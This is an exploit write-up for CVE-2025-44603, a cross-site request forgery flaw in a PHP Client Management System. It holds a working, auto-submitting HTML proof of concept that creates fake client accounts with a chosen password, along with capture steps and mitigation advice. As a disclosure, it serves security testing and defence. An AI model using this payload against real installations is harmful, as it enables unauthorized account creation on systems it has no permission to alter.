## https://sploitus.com/exploit?id=6590B903-4E1B-5445-BFF9-15C5861DA52B
# CVE-2025-44603 (CSRF Vulnerability: Leads to Creating Fake Users)
## Introduction
Cross-Site Request Forgery (CSRF) is an attack where an authenticated user is tricked into submitting a malicious request to a web application. This can lead to unauthorized actions being performed on behalf of the user . In this report, we demonstrate how CSRF can be used to create fake users in a **Client Management System** and suggest mitigation strategies.
## Environment Setup
- Locally hosted **Client Management System** using **MySQL** and **PHP**.
- Functionality for adding clients and their services.
## Steps to Exploit CSRF
### 1. Login as Admin
Using provided credentials, log in to the Client Management System.

### 2. Add a New Client
- Select **Add Client** option.
- Enter the required client details.


### 3. Capture the Client Adding Request
1. Navigate to the **Save** button.
2. Set up **Burp Suite** to intercept requests
3. Click **Save** and capture the HTTP request before it reaches the server
4. Send the captured request to the **Repeater** tab without the session cookie for analysis


## CSRF Code for fake Users
Below is the **HTML PoC** for CSRF attack:
```html
<html>
<body>
<form action="http://localhost/clientms/admin/add-client.php" method="POST">
<input type="hidden" name="accounttype" value="Active Account" />
<input type="hidden" name="cname" value="moulimurugan" />
<input type="hidden" name="comname" value="kppr" />
<input type="hidden" name="address" value="vijayamangalam" />
<input type="hidden" name="city" value="erode" />
<input type="hidden" name="state" value="tamil" />
<input type="hidden" name="zcode" value="638026" />
<input type="hidden" name="wphnumber" value="968560710" />
<input type="hidden" name="cellphnumber" value="6931052465" />
<input type="hidden" name="ophnumber" value="9638560410" />
<input type="hidden" name="email" value="moulimurugan@gmail.com" />
<input type="hidden" name="password" value="moulimurugan" />
<input type="hidden" name="websiteadd" value="clientmsdb" />
<input type="hidden" name="notes" value="Nil" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
## Creating Fake Users
- Modify existing details to create **fake users**


### Testing the CSRF PoC
1. Open the generated **CSRF PoC link** in a browser.
2. The webpage opens with a **Submit** button.
3. Click **Submit**, and the request executes, creating fake users.


## Confirming Fake Clients Creation
- After submission, fake clients appear in the admin dashboard.


## Mitigation Strategies
To prevent CSRF attacks, implement the following measures:
1. **CSRF Tokens**
- Use **anti-CSRF tokens** in all form submissions and verify them on the server-side.
2. **SameSite Cookies**
- Set session cookies with `SameSite=Strict` or `SameSite=Lax` attributes.
3. **Referer and Origin Header Validation**
- Validate the **Referer** and **Origin** headers before processing requests .
4. **User Authentication Checks**
- Require **CAPTCHAs** for critical actions to prevent automated attacks .
5. **Restrict HTTP Methods**
- Use `POST` for sensitive actions and **avoid processing GET requests** with side effects .
## Conclusion
This report demonstrates how CSRF vulnerabilities can be exploited to create unauthorized accounts in a **Client Management System**. Implementing the suggested mitigation strategies will help secure the application against such attacks.